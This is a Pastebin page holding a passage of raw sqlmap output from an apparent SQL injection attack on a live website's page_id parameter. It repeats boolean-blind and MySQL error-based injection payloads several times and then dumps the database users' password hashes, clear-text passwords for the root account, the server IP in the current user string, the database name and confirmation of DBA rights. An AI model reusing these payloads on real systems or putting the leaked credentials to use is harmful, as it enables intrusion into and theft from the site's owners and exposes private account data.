  848. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  849. ---
  850. Place: GET
  851. Parameter: page_id
  852.     TYPE: boolean-based blind
  853.     Title: AND boolean-based blind - WHERE OR HAVING clause
  854.     Payload: page_id=28167956 AND 1228=1228
  855.  
  856.     TYPE: error-based
  857.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  858.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  859. ---
  860.  
  861. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  862. ---
  863. Place: GET
  864. Parameter: page_id
  865.     TYPE: boolean-based blind
  866.     Title: AND boolean-based blind - WHERE OR HAVING clause
  867.     Payload: page_id=28167956 AND 1228=1228
  868.  
  869.     TYPE: error-based
  870.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  871.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  872. ---
  873.  
  874. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  875. ---
  876. Place: GET
  877. Parameter: page_id
  878.     TYPE: boolean-based blind
  879.     Title: AND boolean-based blind - WHERE OR HAVING clause
  880.     Payload: page_id=28167956 AND 1228=1228
  881.  
  882.     TYPE: error-based
  883.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  884.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  885. ---
  886.  
  887. DATABASE management system users password hashes:
  888. [*] karen [2]:
  889.     password hash: 1c00fc2b05570f2f
  890.     password hash: 248036c235f60aa8
  891. [*] nujeplies [1]:
  892.     password hash: NULL
  893. [*] root [5]:
  894.     password hash: 248036c235f60aa8
  895.     password hash: 248036c235f60aa8
  896.     password hash: 4fc67fc309a271b8
  897.     clear-text password: karen
  898.     clear-text password: karen
  899.     password hash: 4fc67fc309a271b8
  900.     clear-text password: karen
  901.     clear-text password: karen
  902.     password hash: NULL
  903. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  904. ---
  905. Place: GET
  906. Parameter: page_id
  907.     TYPE: boolean-based blind
  908.     Title: AND boolean-based blind - WHERE OR HAVING clause
  909.     Payload: page_id=28167956 AND 1228=1228
  910.  
  911.     TYPE: error-based
  912.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  913.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  914. ---
  915.  
  916. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  917. ---
  918. Place: GET
  919. Parameter: page_id
  920.     TYPE: boolean-based blind
  921.     Title: AND boolean-based blind - WHERE OR HAVING clause
  922.     Payload: page_id=28167956 AND 1228=1228
  923.  
  924.     TYPE: error-based
  925.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  926.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  927. ---
  928.  
  929. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  930. ---
  931. Place: GET
  932. Parameter: page_id
  933.     TYPE: boolean-based blind
  934.     Title: AND boolean-based blind - WHERE OR HAVING clause
  935.     Payload: page_id=28167956 AND 1228=1228
  936.  
  937.     TYPE: error-based
  938.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  939.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  940. ---
  941.  
  942. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  943. ---
  944. Place: GET
  945. Parameter: page_id
  946.     TYPE: boolean-based blind
  947.     Title: AND boolean-based blind - WHERE OR HAVING clause
  948.     Payload: page_id=28167956 AND 1228=1228
  949.  
  950.     TYPE: error-based
  951.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  952.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  953. ---
  954.  
  955. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  956. ---
  957. Place: GET
  958. Parameter: page_id
  959.     TYPE: boolean-based blind
  960.     Title: AND boolean-based blind - WHERE OR HAVING clause
  961.     Payload: page_id=28167956 AND 1228=1228
  962.  
  963.     TYPE: error-based
  964.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  965.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  966. ---
  967.  
  968. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  969. ---
  970. Place: GET
  971. Parameter: page_id
  972.     TYPE: boolean-based blind
  973.     Title: AND boolean-based blind - WHERE OR HAVING clause
  974.     Payload: page_id=28167956 AND 1228=1228
  975.  
  976.     TYPE: error-based
  977.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  978.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  979. ---
  980.  
  981. banner:    '5.0.45-log'
  982.  
  983. CURRENT USER:    'root@208.43.165.226'
  984.  
  985. CURRENT DATABASE:    'orcataco_bumperstic'
  986.  
  987. CURRENT USER IS DBA:    'True'
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!